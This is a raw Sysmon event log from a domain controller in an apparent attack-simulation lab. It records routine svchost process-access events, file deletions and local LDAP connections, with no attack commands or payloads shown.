12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.051{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.051{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.035{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.035{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.004{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.950{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.950{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.950{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.935{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.450{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53579-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.450{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53579-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.202{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53578-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.202{266CAFBE-64C4-6064-A300-00000000AE01}5052C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53578-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.180{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53577-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.180{266CAFBE-64C4-6064-A300-00000000AE01}5052C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53577-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.452{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB51A6B1059970A9E6BA5CF4ECB9CF09,SHA256=86367644FB0C042F96D959E96DBC20490EC332B63DD82070EF02069EB447DA1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.421{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65D1F0EBB6FEE5F555A57057419111DF,SHA256=36F9E6AE2F3B424F70429A33063F570F199FAFB05BFF06BF3991F4084FD781FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.405{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 